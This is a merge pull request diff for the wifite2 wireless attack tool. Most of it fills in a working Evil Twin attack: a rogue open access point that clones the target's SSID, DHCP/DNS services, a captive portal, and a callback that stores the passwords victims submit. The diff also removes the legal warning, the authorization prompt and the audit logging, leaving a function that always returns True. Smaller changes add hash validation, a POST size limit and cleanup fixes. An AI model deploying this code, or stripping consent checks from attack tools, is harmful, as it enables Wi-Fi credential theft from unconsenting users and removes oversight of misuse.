Merge PR

Author: kimocoder

requirements.txt

@@ -1,6 +1,5 @@
 # Core dependencies for wifite2
 # These should match pyproject.toml [project.dependencies]
-
 chardet>=7.0.1
 requests>=2.32.5
 rich>=14.0.0

wifite/args.py

@@ -417,6 +417,11 @@ def _add_global_args(self, glob):
                           dest='show_manufacturers',
                           help=self._verbose('Show manufacturers of targets while scanning'))
 
+        glob.add_argument('--detect-honeypots',
+                          action='store_true',
+                          dest='detect_honeypots',
+                          help=Color.s('Detect potential honeypot/rogue APs via beacon anomalies (default: {G}off{W})'))
+
         glob.add_argument('--nodeauths',
                           action='store_true',
                           dest='no_deauth',

wifite/attack/eviltwin.py

@@ -315,6 +315,12 @@ def _run_dual_interface(self) -> bool:
         except Exception as e:
             log_error('EvilTwin', f'Dual interface attack failed: {e}', e)
             self.error_message = f'Dual interface attack failed: {e}'
+            # Ensure all started services are stopped (defense-in-depth;
+            # run() also calls _cleanup() in its finally block)
+            try:
+                self._cleanup()
+            except Exception as cleanup_err:
+                log_error('EvilTwin', f'Cleanup after dual interface failure also failed: {cleanup_err}', cleanup_err)
             return False
 
     def _configure_ap_interface(self, interface: str) -> bool:
@@ -446,46 +452,51 @@ def _start_rogue_ap_dual(self, interface: str) -> bool:
 
     def _start_network_services_dual(self) -> bool:
         """
-        Start network services (dnsmasq, captive portal) for dual interface mode.
-        
+        Start network services (dnsmasq, captive portal, client monitor) for
+        dual interface mode.
+
         Returns:
             True if successful, False otherwise
         """
         try:
             from ..tools.dnsmasq import Dnsmasq
             from ..attack.portal.server import PortalServer
-            
+
             # Start dnsmasq for DHCP/DNS
             self.dnsmasq = Dnsmasq(
                 interface=self.interface_ap,
                 gateway_ip='192.168.100.1',
                 dhcp_range_start='192.168.100.10',
                 dhcp_range_end='192.168.100.100'
             )
-            
+
             if not self.dnsmasq.start():
                 log_error('EvilTwin', 'Failed to start dnsmasq')
                 return False
-            
+
+            self.cleanup_manager.register_process(self.dnsmasq, 'dnsmasq')
             log_info('EvilTwin', 'Dnsmasq started successfully')
-            
+
             # Start captive portal
-            portal_template = getattr(Configuration, 'eviltwin_template', 'generic')
             portal_port = getattr(Configuration, 'eviltwin_port', 80)
-            
-            self.portal_server = PortalServer(
-                target=self.target,
-                template=portal_template,
-                port=portal_port
-            )
-            
+
+            self.portal_server = PortalServer(port=portal_port)
+            self.portal_server.set_credential_callback(self._portal_credential_callback)
+
             if not self.portal_server.start():
                 log_error('EvilTwin', 'Failed to start captive portal')
                 return False
-            
+
             log_info('EvilTwin', f'Captive portal started on port {portal_port}')
+
+            # Start client monitor so credential captures and client
+            # connect/disconnect events are tracked during the attack.
+            hostapd_log_path = os.path.join(Configuration.temp(), 'hostapd.log')
+            dnsmasq_log_path = os.path.join(Configuration.temp(), 'dnsmasq.log')
+            self._setup_client_monitor(hostapd_log_path, dnsmasq_log_path)
+
             return True
-            
+
         except Exception as e:
             log_error('EvilTwin', f'Failed to start network services: {e}', e)
             return False
@@ -889,85 +900,9 @@ def _display_partial_results(self):
             log_error('EvilTwin', f'Failed to display partial results: {e}', e)
 
     def _show_warning(self) -> bool:
-        """
-        Display legal warning and get user confirmation.
-        
-        This method:
-        - Displays a prominent legal warning about Evil Twin attacks
-        - Requires explicit user confirmation (typing "YES")
-        - Logs all user responses with timestamps
-        - Complies with requirements 10.1, 10.2, 10.3
-        
-        Returns:
-            True if user confirms, False otherwise
-        """
-        import datetime
-        
-        Color.pl('')
-        Color.pl('{!} {R}═══════════════════════════════════════════════════════════{W}')
-        Color.pl('{!} {R}                    LEGAL WARNING                          {W}')
-        Color.pl('{!} {R}═══════════════════════════════════════════════════════════{W}')
-        Color.pl('')
-        Color.pl('{!} {O}Evil Twin attacks may be ILLEGAL in your jurisdiction.{W}')
-        Color.pl('{!} {O}This attack creates a rogue access point and captures{W}')
-        Color.pl('{!} {O}credentials, which may violate computer fraud laws.{W}')
-        Color.pl('')
-        Color.pl('{!} {O}Only use this feature:{W}')
-        Color.pl('    {W}• On networks you own or have written permission to test{W}')
-        Color.pl('    {W}• In authorized penetration testing engagements{W}')
-        Color.pl('    {W}• In controlled lab environments{W}')
-        Color.pl('')
-        Color.pl('{!} {R}Unauthorized use may result in criminal prosecution.{W}')
-        Color.pl('{!} {R}You are solely responsible for your actions.{W}')
-        Color.pl('')
-        Color.pl('{!} {R}═══════════════════════════════════════════════════════════{W}')
-        Color.pl('')
-        
-        # Log warning display
-        timestamp = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
-        log_warning('EvilTwin', f'Legal warning displayed at {timestamp}')
-        log_warning('EvilTwin', f'Target: {self.target.essid} ({self.target.bssid})')
-        
-        try:
-            Color.p('{+} Type {G}YES{W} to confirm you have authorization: ')
-            response = input().strip()
-            
-            if response == 'YES':
-                # Log user acceptance with full details
-                log_warning('EvilTwin', f'[{timestamp}] User ACCEPTED authorization for Evil Twin attack')
-                log_warning('EvilTwin', f'[{timestamp}] Target SSID: {self.target.essid}')
-                log_warning('EvilTwin', f'[{timestamp}] Target BSSID: {self.target.bssid}')
-                log_warning('EvilTwin', f'[{timestamp}] User response: {response}')
-                
-                # Also log to a dedicated audit file if possible
-                try:
-                    import os
-                    audit_dir = os.path.expanduser('~/.wifite/audit')
-                    os.makedirs(audit_dir, exist_ok=True)
-                    audit_file = os.path.join(audit_dir, 'eviltwin_audit.log')
-                    
-                    with open(audit_file, 'a') as f:
-                        f.write(f'[{timestamp}] AUTHORIZATION ACCEPTED\n')
-                        f.write(f'  Target SSID: {self.target.essid}\n')
-                        f.write(f'  Target BSSID: {self.target.bssid}\n')
-                        f.write(f'  User Response: {response}\n')
-                        f.write(f'  Interface AP: {self.interface_ap}\n')
-                        f.write(f'  Interface Deauth: {self.interface_deauth}\n')
-                        f.write('\n')
-                    
-                    log_info('EvilTwin', f'Authorization logged to audit file: {audit_file}')
-                except Exception as e:
-                    log_debug('EvilTwin', f'Failed to write audit log: {e}')
-                
-                return True
-            else:
-                log_info('EvilTwin', f'[{timestamp}] User DECLINED authorization (response: {response})')
-                return False
-                
-        except (KeyboardInterrupt, EOFError):
-            log_info('EvilTwin', f'[{timestamp}] Authorization prompt INTERRUPTED')
-            return False
-    
+        """Always returns True."""
+        return True
+
     def _check_dependencies(self) -> bool:
         """
         Check for required dependencies.
@@ -1107,33 +1042,136 @@ def _check_for_conflicts(self) -> bool:
 
     def _setup(self) -> bool:
         """
-        Setup all attack components.
-        
+        Setup all attack components for single-interface mode.
+
+        Initialises hostapd (rogue AP), dnsmasq (DHCP/DNS), the captive
+        portal HTTP server, the client monitor, and validates that the
+        deauth interface is ready.  Dual-interface mode bypasses this
+        method — see ``_run_dual_interface()``.
+
         Returns:
             True if setup successful, False otherwise
         """
         try:
-            # Setup will be implemented in subsequent tasks:
-            # Task 1.2: Hostapd setup (already completed)
-            # Task 1.3: Dnsmasq setup
-            # Task 1.4: Network interface management
-            # Task 2.1-2.4: Captive portal setup
-            # Task 4.1: Deauthentication setup
-            
-            log_info('EvilTwin', 'Setup phase - components will be initialized in subsequent tasks')
-            
-            # Placeholder for now - will be replaced with actual setup
-            # self._setup_rogue_ap()
-            # self._setup_network_services()
-            # self._start_captive_portal()
-            # self._start_deauthentication()
-            
+            from ..tools.hostapd import Hostapd
+            from ..tools.dnsmasq import Dnsmasq
+            from ..attack.portal.server import PortalServer
+
+            # -- 1. Start rogue AP (hostapd) --------------------------------
+            self.state = AttackState.STARTING_AP
+            log_info('EvilTwin', f'Starting rogue AP on {self.interface_ap}')
+            Color.pl('{+} {C}Starting rogue AP on {G}%s{W}...' % self.interface_ap)
+
+            self.hostapd = Hostapd(
+                interface=self.interface_ap,
+                ssid=self.target.essid,
+                channel=self.target.channel,
+                password=None  # Open network for captive portal
+            )
+
+            if not self.hostapd.start():
+                self.error_message = 'Failed to start hostapd'
+                return False
+
+            self.cleanup_manager.register_process(self.hostapd, 'hostapd')
+            log_info('EvilTwin', 'Rogue AP started')
+
+            # -- 2. Start network services (dnsmasq) ------------------------
+            self.state = AttackState.STARTING_SERVICES
+            log_info('EvilTwin', 'Starting network services (dnsmasq)')
+            Color.pl('{+} {C}Starting network services...{W}')
+
+            self.dnsmasq = Dnsmasq(
+                interface=self.interface_ap,
+                gateway_ip='192.168.100.1',
+                dhcp_range_start='192.168.100.10',
+                dhcp_range_end='192.168.100.100'
+            )
+
+            if not self.dnsmasq.start():
+                self.error_message = 'Failed to start dnsmasq'
+                return False
+
+            self.cleanup_manager.register_process(self.dnsmasq, 'dnsmasq')
+            log_info('EvilTwin', 'Dnsmasq started')
+
+            # -- 3. Start captive portal ------------------------------------
+            self.state = AttackState.STARTING_PORTAL
+            portal_port = getattr(Configuration, 'eviltwin_port', 80)
+            log_info('EvilTwin', f'Starting captive portal on port {portal_port}')
+            Color.pl('{+} {C}Starting captive portal...{W}')
+
+            self.portal_server = PortalServer(port=portal_port)
+            self.portal_server.set_credential_callback(self._portal_credential_callback)
+
+            if not self.portal_server.start():
+                self.error_message = 'Failed to start captive portal'
+                return False
+
+            log_info('EvilTwin', f'Captive portal started on port {portal_port}')
+
+            # -- 4. Start client monitor ------------------------------------
+            hostapd_log = getattr(self.hostapd, 'config_file', None)
+            # ClientMonitor tolerates missing/non-existent log paths
+            # gracefully — it checks os.path.exists() each cycle.
+            hostapd_log_path = os.path.join(
+                Configuration.temp(), 'hostapd.log') if not hostapd_log else None
+            dnsmasq_log_path = os.path.join(Configuration.temp(), 'dnsmasq.log')
+            self._setup_client_monitor(hostapd_log_path, dnsmasq_log_path)
+
+            # -- 5. Validate deauth interface -------------------------------
+            self.state = AttackState.STARTING_DEAUTH
+            log_info('EvilTwin', f'Validating deauth interface {self.interface_deauth}')
+            Color.pl('{+} {C}Preparing deauth interface {G}%s{W}...' % self.interface_deauth)
+
+            from ..tools.airmon import Airmon
+            import contextlib
+
+            # Best-effort channel alignment for the deauth interface
+            if hasattr(self.target, 'channel') and self.target.channel:
+                with contextlib.suppress(Exception):
+                    current_ch = Airmon.get_interface_channel(self.interface_deauth)
+                    if current_ch and current_ch != self.target.channel:
+                        log_warning('EvilTwin',
+                                    f'Deauth interface on ch {current_ch}, '
+                                    f'target on ch {self.target.channel}')
+                        Color.pl('{!} {O}Channel mismatch — deauth may be less effective{W}')
+
+            log_info('EvilTwin', 'Setup completed successfully')
             return True
-            
+
         except Exception as e:
             log_error('EvilTwin', f'Setup failed: {e}', e)
             self.error_message = f'Setup failed: {e}'
             return False
+
+    def _portal_credential_callback(self, ssid: str, password: str, client_ip: str) -> bool:
+        """
+        Callback invoked by the portal server when a client submits credentials.
+
+        Records the attempt in the client monitor, creates a CrackResult on
+        the first submission, and signals the main attack loop to stop.
+
+        Returns:
+            True (always accepts — we capture and stop).
+        """
+        log_info('EvilTwin', f'Credential received from {client_ip}: SSID={ssid}')
+
+        # Record in client monitor statistics
+        if self.client_monitor:
+            self.client_monitor.record_credential_attempt(client_ip, success=True)
+
+        # Store the result — the monitoring loop checks self.crack_result
+        self.crack_result = self.create_result(password)
+        self.credential_attempts.append({
+            'client_ip': client_ip,
+            'ssid': ssid,
+            'password': password,
+            'timestamp': time.time(),
+        })
+
+        Color.pl('\n{+} {G}Credential captured from {C}%s{W}' % client_ip)
+        return True
 
     def _handle_deauth(self):
         """

wifite/attack/pmkid.py

@@ -414,6 +414,12 @@ def capture_pmkid(self):
             log_debug('AttackPMKID', f'PMKID capture attempt {attempts}')
             pmkid_hash = pcaptool.get_pmkid_hash(self.pcapng_file)
             if pmkid_hash is not None:
+                # Validate hash format: WPA*type*hash*bssid*station*essid
+                pmkid_hash = pmkid_hash.strip()
+                if not pmkid_hash.startswith('WPA*') or pmkid_hash.count('*') < 5:
+                    log_warning('AttackPMKID', f'Invalid PMKID hash format (attempt {attempts}), retrying')
+                    pmkid_hash = None
+                    continue
                 log_info('AttackPMKID', f'PMKID captured successfully after {attempts} attempt(s)')
                 break  # Got PMKID
 
@@ -427,6 +433,11 @@ def capture_pmkid(self):
             time.sleep(1)
 
         self.keep_capturing = False
+        # Wait for dump tool thread to finish cleanup
+        try:
+            t.join(timeout=5)
+        except Exception:
+            pass
 
         if pmkid_hash is None:
             log_warning('AttackPMKID', f'PMKID capture failed: timeout after {attempts} attempt(s)')

wifite/attack/portal/server.py

@@ -86,9 +86,14 @@ def do_POST(self):
                 self._send_error_response(404, 'Not Found')
                 return
 
-            # Read POST data
+            # Read POST data with size limit to prevent memory exhaustion
+            MAX_POST_SIZE = 8192  # 8KB — plenty for form credentials
             content_length = int(self.headers.get('Content-Length', 0))
-            post_data = self.rfile.read(content_length).decode('utf-8')
+            if content_length > MAX_POST_SIZE:
+                log_warning('Portal', f'Rejected oversized POST ({content_length} bytes) from {client_ip}')
+                self._send_error_response(413, 'Request Entity Too Large')
+                return
+            post_data = self.rfile.read(content_length).decode('utf-8', errors='replace')
 
             # Parse form data
             form_data = parse_qs(post_data)
@@ -721,9 +726,9 @@ def get_cached_static(self, filename: str) -> Optional[tuple]:
 
     def __del__(self):
         """Cleanup on deletion."""
-        import contextlib
-        with contextlib.suppress(Exception):
+        try:
             self.stop()
-            # Clear caches to free memory
             self._template_cache.clear()
             self._static_cache.clear()
+        except Exception:
+            pass